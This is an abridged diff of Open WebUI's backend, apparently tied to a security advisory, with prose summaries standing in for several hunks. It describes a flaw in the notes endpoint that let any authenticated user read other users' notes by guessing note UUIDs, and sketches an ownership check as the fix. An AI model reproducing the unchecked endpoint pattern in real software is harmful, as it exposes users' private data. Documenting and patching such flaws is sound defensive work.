             connection = parse(db_url, unquote_user=True, unquote_password=True)
@@ -80,7 +78,7 @@ def register_connection(db_url):
             # Enable autoconnect for SQLite databases, managed by Peewee
             db.autoconnect = True
             db.reuse_if_open = True
-            log.info("Connected to SQLite database")
+            log.info('Connected to SQLite database')
         else:
-            raise ValueError("Unsupported database connection")
+            raise ValueError('Unsupported database connection')

     return db
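CustomReconnectMixin extends playhouse's ReconnectMixin with (exception class, message substring) pairs; a failed query is retried on a fresh connection only when both parts match. Conceptually, simplified from how the mixin consumes these pairs (illustrative helper, not code from the patch):

def is_reconnect_error(exc: Exception, reconnect_errors) -> bool:
    message = str(exc).lower()
    return any(
        isinstance(exc, exc_class) and marker in message
        for exc_class, marker in reconnect_errors
    )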
backend/open_webui/main.py  +464 −593  modified

@@ -565,7 +565,7 @@
 from open_webui.constants import ERROR_MESSAGES

 if SAFE_MODE:
-    print("SAFE MODE ENABLED")
+    print('SAFE MODE ENABLED')
     Functions.deactivate_all_functions()

 logging.basicConfig(stream=sys.stdout, level=GLOBAL_LOG_LEVEL)
@@ -578,16 +578,16 @@ async def get_response(self, path: str, scope):
             return await super().get_response(path, scope)
         except (HTTPException, StarletteHTTPException) as ex:
             if ex.status_code == 404:
-                if path.endswith(".js"):
+                if path.endswith('.js'):
                     # Return 404 for javascript files
                     raise ex
                 else:
-                    return await super().get_response("index.html", scope)
+                    return await super().get_response('index.html', scope)
             else:
                 raise ex

-if LOG_FORMAT != "json":
+if LOG_FORMAT != 'json':
     print(rf"""
 ██████╗ ██████╗ ███████╗███╗   ██╗    ██╗    ██╗███████╗██████╗ ██╗   ██╗██╗
██╔═══██╗██╔══██╗██╔════╝████╗  ██║    ██║    ██║██╔════╝██╔══██╗██║   ██║██║
@@ -598,7 +598,7 @@ async def get_response(self, path: str, scope):

 v{VERSION} - building the best AI user interface.
-{f"Commit: {WEBUI_BUILD_HASH}" if WEBUI_BUILD_HASH != "dev-build" else ""}
+{f'Commit: {WEBUI_BUILD_HASH}' if WEBUI_BUILD_HASH != 'dev-build' else ''}
 https://github.com/open-webui/open-webui
 """)

@@ -626,22 +626,18 @@ async def lifespan(app: FastAPI):
     # This should be blocking (sync) so functions are not deactivated on first /get_models calls
     # when the first user lands on the / route.
-    log.info("Installing external dependencies of functions and tools...")
+    log.info('Installing external dependencies of functions and tools...')
     install_tool_and_function_dependencies()

     app.state.redis = get_redis_connection(
         redis_url=REDIS_URL,
-        redis_sentinels=get_sentinels_from_env(
-            REDIS_SENTINEL_HOSTS, REDIS_SENTINEL_PORT
-        ),
+        redis_sentinels=get_sentinels_from_env(REDIS_SENTINEL_HOSTS, REDIS_SENTINEL_PORT),
         redis_cluster=REDIS_CLUSTER,
         async_mode=True,
     )

     if app.state.redis is not None:
-        app.state.redis_task_command_listener = asyncio.create_task(
-            redis_task_command_listener(app)
-        )
+        app.state.redis_task_command_listener = asyncio.create_task(redis_task_command_listener(app))

     if THREAD_POOL_SIZE and THREAD_POOL_SIZE > 0:
         limiter = anyio.to_thread.current_default_thread_limiter()
@@ -656,66 +652,64 @@ async def lifespan(app: FastAPI):
             Request(
                 # Creating a mock request object to pass to get_all_models
                 {
-                    "type": "http",
-                    "asgi.version": "3.0",
-                    "asgi.spec_version": "2.0",
-                    "method": "GET",
-                    "path": "/internal",
-                    "query_string": b"",
-                    "headers": Headers({}).raw,
-                    "client": ("127.0.0.1", 12345),
-                    "server": ("127.0.0.1", 80),
-                    "scheme": "http",
-                    "app": app,
+                    'type': 'http',
+                    'asgi.version': '3.0',
+                    'asgi.spec_version': '2.0',
+                    'method': 'GET',
+                    'path': '/internal',
+                    'query_string': b'',
+                    'headers': Headers({}).raw,
+                    'client': ('127.0.0.1', 12345),
+                    'server': ('127.0.0.1', 80),
+                    'scheme': 'http',
+                    'app': app,
                 }
             ),
             None,
         )
     except Exception as e:
-        log.warning(f"Failed to pre-fetch models at startup: {e}")
+        log.warning(f'Failed to pre-fetch models at startup: {e}')

     # Pre-fetch tool server specs so the first request doesn't pay the latency cost
     if len(app.state.config.TOOL_SERVER_CONNECTIONS) > 0:
-        log.info("Initializing tool servers...")
+        log.info('Initializing tool servers...')
         try:
             mock_request = Request(
                 {
-                    "type": "http",
-                    "asgi.version": "3.0",
-                    "asgi.spec_version": "2.0",
-                    "method": "GET",
-                    "path": "/internal",
-                    "query_string": b"",
-                    "headers": Headers({}).raw,
-                    "client": ("127.0.0.1", 12345),
-                    "server": ("127.0.0.1", 80),
-                    "scheme": "http",
-                    "app": app,
+                    'type': 'http',
+                    'asgi.version': '3.0',
+                    'asgi.spec_version': '2.0',
+                    'method': 'GET',
+                    'path': '/internal',
+                    'query_string': b'',
+                    'headers': Headers({}).raw,
+                    'client': ('127.0.0.1', 12345),
+                    'server': ('127.0.0.1', 80),
+                    'scheme': 'http',
+                    'app': app,
                 }
             )
             await set_tool_servers(mock_request)
-            log.info(f"Initialized {len(app.state.TOOL_SERVERS)} tool server(s)")
+            log.info(f'Initialized {len(app.state.TOOL_SERVERS)} tool server(s)')

             await set_terminal_servers(mock_request)
-            log.info(
-                f"Initialized {len(app.state.TERMINAL_SERVERS)} terminal server(s)"
-            )
+            log.info(f'Initialized {len(app.state.TERMINAL_SERVERS)} terminal server(s)')
         except Exception as e:
-            log.warning(f"Failed to initialize tool/terminal servers at startup: {e}")
+            log.warning(f'Failed to initialize tool/terminal servers at startup: {e}')

     # Mark application as ready to accept traffic from a startup perspective.
     app.state.startup_complete = True

     yield

-    if hasattr(app.state, "redis_task_command_listener"):
+    if hasattr(app.state, 'redis_task_command_listener'):
         app.state.redis_task_command_listener.cancel()

 app = FastAPI(
-    title="Open WebUI",
-    docs_url="/docs" if ENV == "dev" else None,
-    openapi_url="/openapi.json" if ENV == "dev" else None,
+    title='Open WebUI',
+    docs_url='/docs' if ENV == 'dev' else None,
+    openapi_url='/openapi.json' if ENV == 'dev' else None,
     redoc_url=None,
     lifespan=lifespan,
 )
@@ -837,9 +831,7 @@ async def lifespan(app: FastAPI):
 app.state.config.ENABLE_LOGIN_FORM = ENABLE_LOGIN_FORM

 app.state.config.ENABLE_API_KEYS = ENABLE_API_KEYS
-app.state.config.ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS = (
-    ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS
-)
+app.state.config.ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS = ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS
 app.state.config.API_KEYS_ALLOWED_ENDPOINTS = API_KEYS_ALLOWED_ENDPOINTS

 app.state.config.JWT_EXPIRES_IN = JWT_EXPIRES_IN
@@ -885,15 +877,15 @@ async def lifespan(app: FastAPI):
 from open_webui.utils.access_control import migrate_access_control

 connections = app.state.config.TOOL_SERVER_CONNECTIONS
-if any("access_control" in c.get("config", {}) for c in connections):
+if any('access_control' in c.get('config', {}) for c in connections):
     for connection in connections:
-        migrate_access_control(connection.get("config", {}))
+        migrate_access_control(connection.get('config', {}))
     app.state.config.TOOL_SERVER_CONNECTIONS = connections

 arena_models = app.state.config.EVALUATION_ARENA_MODELS
-if any("access_control" in m.get("meta", {}) for m in arena_models):
+if any('access_control' in m.get('meta', {}) for m in arena_models):
     for model in arena_models:
-        migrate_access_control(model.get("meta", {}))
+        migrate_access_control(model.get('meta', {}))
     app.state.config.EVALUATION_ARENA_MODELS = arena_models

 app.state.config.OAUTH_USERNAME_CLAIM = OAUTH_USERNAME_CLAIM
@@ -962,9 +954,7 @@ async def lifespan(app: FastAPI):
 app.state.config.RAG_FULL_CONTEXT = RAG_FULL_CONTEXT
 app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL = BYPASS_EMBEDDING_AND_RETRIEVAL
 app.state.config.ENABLE_RAG_HYBRID_SEARCH = ENABLE_RAG_HYBRID_SEARCH
-app.state.config.ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS = (
-    ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS
-)
+app.state.config.ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS = ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS
 app.state.config.ENABLE_WEB_LOADER_SSL_VERIFICATION = ENABLE_WEB_LOADER_SSL_VERIFICATION

 app.state.config.CONTENT_EXTRACTION_ENGINE = CONTENT_EXTRACTION_ENGINE
@@ -975,9 +965,7 @@
 app.state.config.DATALAB_MARKER_FORCE_OCR = DATALAB_MARKER_FORCE_OCR
 app.state.config.DATALAB_MARKER_PAGINATE = DATALAB_MARKER_PAGINATE
 app.state.config.DATALAB_MARKER_STRIP_EXISTING_OCR = DATALAB_MARKER_STRIP_EXISTING_OCR
-app.state.config.DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION = (
-    DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION
-)
+app.state.config.DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION = DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION
 app.state.config.DATALAB_MARKER_FORMAT_LINES = DATALAB_MARKER_FORMAT_LINES
 app.state.config.DATALAB_MARKER_USE_LLM = DATALAB_MARKER_USE_LLM
 app.state.config.DATALAB_MARKER_OUTPUT_FORMAT = DATALAB_MARKER_OUTPUT_FORMAT
@@ -999,9 +987,7 @@ async def lifespan(app: FastAPI):
 app.state.config.MINERU_PARAMS = MINERU_PARAMS

 app.state.config.TEXT_SPLITTER = RAG_TEXT_SPLITTER
-app.state.config.ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER = (
-    ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER
-)
+app.state.config.ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER = ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER

 app.state.config.TIKTOKEN_ENCODING_NAME = TIKTOKEN_ENCODING_NAME
@@ -1053,9 +1039,7 @@ async def lifespan(app: FastAPI):
 app.state.config.WEB_LOADER_TIMEOUT = WEB_LOADER_TIMEOUT
 app.state.config.WEB_SEARCH_TRUST_ENV = WEB_SEARCH_TRUST_ENV
-app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL = (
-    BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL
-)
+app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL = BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL
 app.state.config.BYPASS_WEB_SEARCH_WEB_LOADER = BYPASS_WEB_SEARCH_WEB_LOADER

 app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION = ENABLE_GOOGLE_DRIVE_INTEGRATION
@@ -1120,13 +1104,8 @@ async def lifespan(app: FastAPI):

 try:
-    app.state.ef = get_ef(
-        app.state.config.RAG_EMBEDDING_ENGINE, app.state.config.RAG_EMBEDDING_MODEL
-    )
-    if (
-        app.state.config.ENABLE_RAG_HYBRID_SEARCH
-        and not app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL
-    ):
+    app.state.ef = get_ef(app.state.config.RAG_EMBEDDING_ENGINE, app.state.config.RAG_EMBEDDING_MODEL)
+    if app.state.config.ENABLE_RAG_HYBRID_SEARCH and not app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL:
         app.state.rf = get_rf(
             app.state.config.RAG_RERANKING_ENGINE,
             app.state.config.RAG_RERANKING_MODEL,
@@ -1137,7 +1116,7 @@ async def lifespan(app: FastAPI):
     else:
         app.state.rf = None
 except Exception as e:
-    log.error(f"Error updating models: {e}")
+    log.error(f'Error updating models: {e}')
     pass

@@ -1147,26 +1126,26 @@ async def lifespan(app: FastAPI):
     embedding_function=app.state.ef,
     url=(
         app.state.config.RAG_OPENAI_API_BASE_URL
-        if app.state.config.RAG_EMBEDDING_ENGINE == "openai"
+        if app.state.config.RAG_EMBEDDING_ENGINE == 'openai'
         else (
             app.state.config.RAG_OLLAMA_BASE_URL
-            if app.state.config.RAG_EMBEDDING_ENGINE == "ollama"
+            if app.state.config.RAG_EMBEDDING_ENGINE == 'ollama'
             else app.state.config.RAG_AZURE_OPENAI_BASE_URL
         )
     ),
     key=(
         app.state.config.RAG_OPENAI_API_KEY
-        if app.state.config.RAG_EMBEDDING_ENGINE == "openai"
+        if app.state.config.RAG_EMBEDDING_ENGINE == 'openai'
         else (
             app.state.config.RAG_OLLAMA_API_KEY
-            if app.state.config.RAG_EMBEDDING_ENGINE == "ollama"
+            if app.state.config.RAG_EMBEDDING_ENGINE == 'ollama'
            else app.state.config.RAG_AZURE_OPENAI_API_KEY
         )
     ),
     embedding_batch_size=app.state.config.RAG_EMBEDDING_BATCH_SIZE,
     azure_api_version=(
         app.state.config.RAG_AZURE_OPENAI_API_VERSION
-        if app.state.config.RAG_EMBEDDING_ENGINE == "azure_openai"
+        if app.state.config.RAG_EMBEDDING_ENGINE == 'azure_openai'
         else None
     ),
     enable_async=app.state.config.ENABLE_ASYNC_EMBEDDING,
@@ -1190,9 +1169,7 @@ async def
lifespan(app: FastAPI): app.state.config.CODE_EXECUTION_JUPYTER_URL = CODE_EXECUTION_JUPYTER_URL app.state.config.CODE_EXECUTION_JUPYTER_AUTH = CODE_EXECUTION_JUPYTER_AUTH app.state.config.CODE_EXECUTION_JUPYTER_AUTH_TOKEN = CODE_EXECUTION_JUPYTER_AUTH_TOKEN -app.state.config.CODE_EXECUTION_JUPYTER_AUTH_PASSWORD = ( - CODE_EXECUTION_JUPYTER_AUTH_PASSWORD -) +app.state.config.CODE_EXECUTION_JUPYTER_AUTH_PASSWORD = CODE_EXECUTION_JUPYTER_AUTH_PASSWORD app.state.config.CODE_EXECUTION_JUPYTER_TIMEOUT = CODE_EXECUTION_JUPYTER_TIMEOUT app.state.config.ENABLE_CODE_INTERPRETER = ENABLE_CODE_INTERPRETER @@ -1201,12 +1178,8 @@ async def lifespan(app: FastAPI): app.state.config.CODE_INTERPRETER_JUPYTER_URL = CODE_INTERPRETER_JUPYTER_URL app.state.config.CODE_INTERPRETER_JUPYTER_AUTH = CODE_INTERPRETER_JUPYTER_AUTH -app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_TOKEN = ( - CODE_INTERPRETER_JUPYTER_AUTH_TOKEN -) -app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD = ( - CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD -) +app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_TOKEN = CODE_INTERPRETER_JUPYTER_AUTH_TOKEN +app.state.config.CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD = CODE_INTERPRETER_JUPYTER_AUTH_PASSWORD app.state.config.CODE_INTERPRETER_JUPYTER_TIMEOUT = CODE_INTERPRETER_JUPYTER_TIMEOUT ######################################## @@ -1282,9 +1255,7 @@ async def lifespan(app: FastAPI): app.state.config.AUDIO_STT_MISTRAL_API_KEY = AUDIO_STT_MISTRAL_API_KEY app.state.config.AUDIO_STT_MISTRAL_API_BASE_URL = AUDIO_STT_MISTRAL_API_BASE_URL -app.state.config.AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS = ( - AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS -) +app.state.config.AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS = AUDIO_STT_MISTRAL_USE_CHAT_COMPLETIONS app.state.config.TTS_ENGINE = AUDIO_TTS_ENGINE @@ -1330,23 +1301,13 @@ async def lifespan(app: FastAPI): app.state.config.TITLE_GENERATION_PROMPT_TEMPLATE = TITLE_GENERATION_PROMPT_TEMPLATE app.state.config.TAGS_GENERATION_PROMPT_TEMPLATE = TAGS_GENERATION_PROMPT_TEMPLATE -app.state.config.IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE = ( - IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE -) -app.state.config.FOLLOW_UP_GENERATION_PROMPT_TEMPLATE = ( - FOLLOW_UP_GENERATION_PROMPT_TEMPLATE -) +app.state.config.IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE = IMAGE_PROMPT_GENERATION_PROMPT_TEMPLATE +app.state.config.FOLLOW_UP_GENERATION_PROMPT_TEMPLATE = FOLLOW_UP_GENERATION_PROMPT_TEMPLATE -app.state.config.TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE = ( - TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE -) +app.state.config.TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE = TOOLS_FUNCTION_CALLING_PROMPT_TEMPLATE app.state.config.QUERY_GENERATION_PROMPT_TEMPLATE = QUERY_GENERATION_PROMPT_TEMPLATE -app.state.config.AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE = ( - AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE -) -app.state.config.AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH = ( - AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH -) +app.state.config.AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE = AUTOCOMPLETE_GENERATION_PROMPT_TEMPLATE +app.state.config.AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH = AUTOCOMPLETE_GENERATION_INPUT_MAX_LENGTH app.state.config.VOICE_MODE_PROMPT_TEMPLATE = VOICE_MODE_PROMPT_TEMPLATE @@ -1366,36 +1327,36 @@ async def lifespan(app: FastAPI): class RedirectMiddleware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): # Check if the request is a GET request - if request.method == "GET": + if request.method == 'GET': path = request.url.path query_params = dict(parse_qs(urlparse(str(request.url)).query)) 
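That startup pre-fetch needs a Request object even though no HTTP request exists yet, so the lifespan hunk hand-builds an ASGI scope. A minimal sketch of the pattern, using only the fields the hunk itself shows:

```python
# Minimal sketch of the mock-request pattern from the lifespan hunk above:
# hand-build an ASGI HTTP scope so request-shaped helpers (get_all_models,
# set_tool_servers, set_terminal_servers) can run before any real request.
from starlette.datastructures import Headers
from starlette.requests import Request

def make_internal_request(app) -> Request:
    return Request(
        {
            'type': 'http',
            'asgi.version': '3.0',
            'asgi.spec_version': '2.0',
            'method': 'GET',
            'path': '/internal',           # synthetic path, never routed
            'query_string': b'',
            'headers': Headers({}).raw,    # empty header list in raw ASGI form
            'client': ('127.0.0.1', 12345),
            'server': ('127.0.0.1', 80),
            'scheme': 'http',
            'app': app,                    # lets handlers reach app.state
        }
    )
```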
The middleware section follows, again mostly requoted. RedirectMiddleware rewrites qualifying GET requests into app redirects: a /watch path with a v query parameter becomes /?youtube=<id>, and a PWA share_target payload in the shared parameter is routed to /?youtube=<id>, /?load-url=<url>, or /?q=<text> depending on whether the shared text is a YouTube URL, another URL, or plain text. APIKeyRestrictionMiddleware applies only to requests authenticated with an sk- API key: when ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS is on, the request path must match one of the comma-separated API_KEYS_ALLOWED_ENDPOINTS entries exactly or as a sub-path, otherwise the middleware answers 403 with "API key not allowed to access this endpoint." The commit_session_after_request and check_url middlewares are reflowed; check_url resolves credentials from the Authorization header, falls back to the token cookie for browser sessions, falls back further to the x-api-key header (only for the Anthropic-compatible /api/message and /api/v1/messages routes), exposes ENABLE_API_KEYS on request state, and stamps an X-Process-Time response header. inspect_websocket rejects /ws/socket.io websocket transports whose Upgrade and Connection headers do not describe a genuine upgrade, a workaround for python-engineio issue https://github.com/miguelgrinberg/python-engineio/issues/367, and the CORS middleware keeps its configured origins with all methods and headers allowed.
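The prefix matching inside APIKeyRestrictionMiddleware is easy to get subtly wrong (a bare startswith would let '/api/models' authorize '/api/modelsx'). The exact rule the hunk applies, lifted into a standalone helper:

```python
# Sketch of the allow-list rule in APIKeyRestrictionMiddleware: an 'sk-'
# key may call a path only if it equals an allowed entry exactly or sits
# under it behind a '/' boundary.
def is_path_allowed(request_path: str, allowed_endpoints_csv: str) -> bool:
    allowed_paths = [p.strip() for p in allowed_endpoints_csv.split(',') if p.strip()]
    return any(
        request_path == allowed or request_path.startswith(allowed + '/')
        for allowed in allowed_paths
    )

# The '/' boundary is what keeps the prefix match honest:
assert is_path_allowed('/api/models/base', '/api/models, /api/chat/completions')
assert not is_path_allowed('/api/modelsx', '/api/models, /api/chat/completions')
```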
Router registration is unchanged apart from quoting: socket.io is mounted at /ws, the ollama and openai proxies keep their prefixes, and the /api/v1 routers are registered for pipelines, tasks, images, audio, retrieval, configs, auths, users, channels, chats, notes, models, knowledge, prompts, tools, skills, memories, folders, groups, files, functions, evaluations, analytics (when ENABLE_ADMIN_ANALYTICS), utils, terminals, and SCIM 2.0 (when ENABLE_SCIM). Audit logging is then configured from AUDIT_LOG_LEVEL, falling back to AuditLevel.NONE when the value is invalid. The /api/models endpoint (also exposed at /api/v1/models for OpenAI compatibility) filters out filter-type pipelines, strips profile-image URLs to shrink the payload, merges tags from the model and its metadata, sorts by the configured model-order list with model name as the tiebreaker, and finally filters the list down to what the requesting user may access. The notes router registered above at /api/v1/notes is the surface this advisory concerns; a sketch of the kind of ownership check it was missing follows.
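The notes router's own hunks are not included in this excerpt, so what follows is a hypothetical sketch, not the shipped 0.8.11 code: it shows the ownership gate the advisory says the endpoint lacked, modeled on the Chats.is_chat_owner check in the chat-completion hunks summarized below. Notes, get_verified_user, router, and the route shape are assumed names from the surrounding codebase.

```python
# Hypothetical sketch (assumed names, not the actual 0.8.11 hunk): gate
# GET /api/v1/notes/{id} on ownership instead of mere authentication.
from fastapi import Depends, HTTPException, status
from open_webui.constants import ERROR_MESSAGES

@router.get('/{id}')
async def get_note_by_id(id: str, user=Depends(get_verified_user)):
    note = Notes.get_note_by_id(id)  # assumed model helper
    # Pre-0.8.11, any authenticated user reaching this point got the note,
    # so guessing or enumerating UUIDs disclosed other users' notes.
    if note is None or (note.user_id != user.id and user.role != 'admin'):
        # 404 rather than 403 for foreign notes, so the response does not
        # confirm that the guessed UUID exists (the chat check below makes
        # the same choice).
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND,
            detail=ERROR_MESSAGES.DEFAULT(),
        )
    return note
```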
The remaining endpoint handlers are reflowed in the same style. /api/models/base returns base models to admins, and /api/embeddings (with /api/v1/embeddings) is the OpenAI-compatible embeddings endpoint. /api/chat/completions (with /api/v1/chat/completions) resolves the requested model, enforcing model access control unless BYPASS_MODEL_ACCESS_CONTROL (or the admin bypass) applies; when a custom model's base model is missing and ENABLE_CUSTOM_MODEL_FALLBACK is set, it falls back to the first entry of DEFAULT_MODELS, otherwise it raises "Model not found". It merges global DEFAULT_MODEL_PARAMS with per-model overrides (stream_response, stream_delta_chunk_size, reasoning_tags, and native versus default function calling) and assembles the request metadata. For persistent chats (ids not prefixed local:), it verifies chat ownership with a lightweight Chats.is_chat_owner EXISTS check, which avoids deserializing the full chat JSON blob, and returns 404 to non-owners unless the user is an admin; it then records any files carried on the parent message. process_chat runs the payload pipeline and the completion handler, upserts the resulting message, and on asyncio.CancelledError shields a final chat:tasks:cancel emission before re-raising (see the sketch below); on other errors it writes the error onto the chat message and emits chat:message:error and chat:tasks:cancel. Cleanup disconnects any MCP clients in reverse order and emits chat:active=false. When session, chat, and message ids are all present, the work is dispatched as a Redis-backed background task keyed by the chat id, chat:active=true is emitted, and a task_id is returned; otherwise the chat is processed inline. /api/message (with /api/v1/messages) is the Anthropic Messages API-compatible endpoint: it converts the Anthropic payload to OpenAI format and wraps streaming responses with openai_stream_to_anthropic_stream to translate the SSE stream back, with no-cache and keep-alive headers. /api/chat/completed and /api/chat/actions/{action_id} pass direct model items through on request state, /api/tasks/stop/{task_id} maps unknown tasks to 404, /api/tasks lists tasks, and /api/tasks/chat/{chat_id} returns an empty task list unless the requesting user owns the chat.
-@app.get("/api/config") +@app.get('/api/config') async def get_app_config(request: Request): user = None token = None - auth_header = request.headers.get("Authorization") + auth_header = request.headers.get('Authorization') if auth_header: cred = get_http_authorization_cred(auth_header) if cred: token = cred.credentials - if not token and "token" in request.cookies: - token = request.cookies.get("token") + if not token and 'token' in request.cookies: + token = request.cookies.get('token') if token: try: @@ -2125,10 +2023,10 @@ async def get_app_config(request: Request): log.debug(e) raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, - detail="Invalid token", + detail='Invalid token', ) - if data is not None and "id" in data: - user = Users.get_user_by_id(data["id"]) + if data is not None and 'id' in data: + user = Users.get_user_by_id(data['id']) user_count = Users.get_num_users() onboarding = False @@ -2137,55 +2035,50 @@ async def get_app_config(request: Request): onboarding = user_count == 0 return { - **({"onboarding": True} if onboarding else {}), - "status": True, - "name": app.state.WEBUI_NAME, - "version": VERSION, - "default_locale": str(DEFAULT_LOCALE), - "oauth": { - "providers": { - name: config.get("name", name) - for name, config in OAUTH_PROVIDERS.items() - } - }, - "features": { - "auth": WEBUI_AUTH, - "auth_trusted_header": bool(app.state.AUTH_TRUSTED_EMAIL_HEADER), - "enable_signup_password_confirmation": ENABLE_SIGNUP_PASSWORD_CONFIRMATION, - "enable_ldap": app.state.config.ENABLE_LDAP, - "enable_api_keys": app.state.config.ENABLE_API_KEYS, - "enable_signup": app.state.config.ENABLE_SIGNUP, - "enable_login_form": app.state.config.ENABLE_LOGIN_FORM, - "enable_websocket": ENABLE_WEBSOCKET_SUPPORT, - "enable_version_update_check": ENABLE_VERSION_UPDATE_CHECK, - "enable_public_active_users_count": ENABLE_PUBLIC_ACTIVE_USERS_COUNT, - "enable_easter_eggs": ENABLE_EASTER_EGGS, + **({'onboarding': True} if onboarding else {}), + 'status': True, + 'name': app.state.WEBUI_NAME, + 'version': VERSION, + 'default_locale': str(DEFAULT_LOCALE), + 'oauth': {'providers': {name: config.get('name', name) for name, config in OAUTH_PROVIDERS.items()}}, + 'features': { + 'auth': WEBUI_AUTH, + 'auth_trusted_header': bool(app.state.AUTH_TRUSTED_EMAIL_HEADER), + 'enable_signup_password_confirmation': ENABLE_SIGNUP_PASSWORD_CONFIRMATION, + 'enable_ldap': app.state.config.ENABLE_LDAP, + 'enable_api_keys': app.state.config.ENABLE_API_KEYS, + 'enable_signup': app.state.config.ENABLE_SIGNUP, + 'enable_login_form': app.state.config.ENABLE_LOGIN_FORM, + 'enable_websocket': ENABLE_WEBSOCKET_SUPPORT, + 'enable_version_update_check': ENABLE_VERSION_UPDATE_CHECK, + 'enable_public_active_users_count': ENABLE_PUBLIC_ACTIVE_USERS_COUNT, + 'enable_easter_eggs': ENABLE_EASTER_EGGS, **( { - "enable_direct_connections": app.state.config.ENABLE_DIRECT_CONNECTIONS, - "enable_folders": app.state.config.ENABLE_FOLDERS, - "folder_max_file_count": app.state.config.FOLDER_MAX_FILE_COUNT, - "enable_channels": app.state.config.ENABLE_CHANNELS, - "enable_notes": app.state.config.ENABLE_NOTES, - "enable_web_search": app.state.config.ENABLE_WEB_SEARCH, - "enable_code_execution": app.state.config.ENABLE_CODE_EXECUTION, - "enable_code_interpreter": app.state.config.ENABLE_CODE_INTERPRETER, - "enable_image_generation": app.state.config.ENABLE_IMAGE_GENERATION, - "enable_autocomplete_generation": app.state.config.ENABLE_AUTOCOMPLETE_GENERATION, - "enable_community_sharing": app.state.config.ENABLE_COMMUNITY_SHARING, 
- "enable_message_rating": app.state.config.ENABLE_MESSAGE_RATING, - "enable_user_webhooks": app.state.config.ENABLE_USER_WEBHOOKS, - "enable_user_status": app.state.config.ENABLE_USER_STATUS, - "enable_admin_export": ENABLE_ADMIN_EXPORT, - "enable_admin_chat_access": ENABLE_ADMIN_CHAT_ACCESS, - "enable_admin_analytics": ENABLE_ADMIN_ANALYTICS, - "enable_google_drive_integration": app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION, - "enable_onedrive_integration": app.state.config.ENABLE_ONEDRIVE_INTEGRATION, - "enable_memories": app.state.config.ENABLE_MEMORIES, + 'enable_direct_connections': app.state.config.ENABLE_DIRECT_CONNECTIONS, + 'enable_folders': app.state.config.ENABLE_FOLDERS, + 'folder_max_file_count': app.state.config.FOLDER_MAX_FILE_COUNT, + 'enable_channels': app.state.config.ENABLE_CHANNELS, + 'enable_notes': app.state.config.ENABLE_NOTES, + 'enable_web_search': app.state.config.ENABLE_WEB_SEARCH, + 'enable_code_execution': app.state.config.ENABLE_CODE_EXECUTION, + 'enable_code_interpreter': app.state.config.ENABLE_CODE_INTERPRETER, + 'enable_image_generation': app.state.config.ENABLE_IMAGE_GENERATION, + 'enable_autocomplete_generation': app.state.config.ENABLE_AUTOCOMPLETE_GENERATION, + 'enable_community_sharing': app.state.config.ENABLE_COMMUNITY_SHARING, + 'enable_message_rating': app.state.config.ENABLE_MESSAGE_RATING, + 'enable_user_webhooks': app.state.config.ENABLE_USER_WEBHOOKS, + 'enable_user_status': app.state.config.ENABLE_USER_STATUS, + 'enable_admin_export': ENABLE_ADMIN_EXPORT, + 'enable_admin_chat_access': ENABLE_ADMIN_CHAT_ACCESS, + 'enable_admin_analytics': ENABLE_ADMIN_ANALYTICS, + 'enable_google_drive_integration': app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION, + 'enable_onedrive_integration': app.state.config.ENABLE_ONEDRIVE_INTEGRATION, + 'enable_memories': app.state.config.ENABLE_MEMORIES, **( { - "enable_onedrive_personal": ENABLE_ONEDRIVE_PERSONAL, - "enable_onedrive_business": ENABLE_ONEDRIVE_BUSINESS, + 'enable_onedrive_personal': ENABLE_ONEDRIVE_PERSONAL, + 'enable_onedrive_business': ENABLE_ONEDRIVE_BUSINESS, } if app.state.config.ENABLE_ONEDRIVE_INTEGRATION else {} @@ -2197,78 +2090,74 @@ async def get_app_config(request: Request): }, **( { - "default_models": app.state.config.DEFAULT_MODELS, - "default_pinned_models": app.state.config.DEFAULT_PINNED_MODELS, - "default_prompt_suggestions": app.state.config.DEFAULT_PROMPT_SUGGESTIONS, - "user_count": user_count, - "code": { - "engine": 